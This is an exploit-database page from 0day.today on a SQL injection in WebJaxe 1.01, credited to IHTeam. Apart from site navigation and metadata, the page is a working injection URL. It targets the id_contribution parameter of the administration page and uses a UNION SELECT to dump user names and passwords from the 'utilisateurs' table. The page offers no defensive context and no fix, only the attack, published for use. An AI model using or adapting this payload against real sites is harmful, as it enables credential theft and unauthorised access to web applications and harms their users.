[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WebJaxe Sql Injection Vulnerability

Author
IHTeam
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12280
Category
web applications
Date add
18-05-2010
Platform
php
===================================
WebJaxe Sql Injection Vulnerability
===================================


###############################################################################
#
# Exploit Title: WebJaxe Sql Injection
# Author: IHTeam
# Software Link: http://media4.obspm.fr/outils/webjaxe/en/
# Version: 1.01
# Tested on: Win/Linux
#
###############################################################################
 
!You need a registred user!
 
http://[site]/[path]/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=[SQL]
 
Example (Show username:password):
http://localhost/webjaxe/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(prenom,char(58),motdepasse),3,4,5,6/**/FROM/**/utilisateurs



#  0day.today [2024-07-05]  #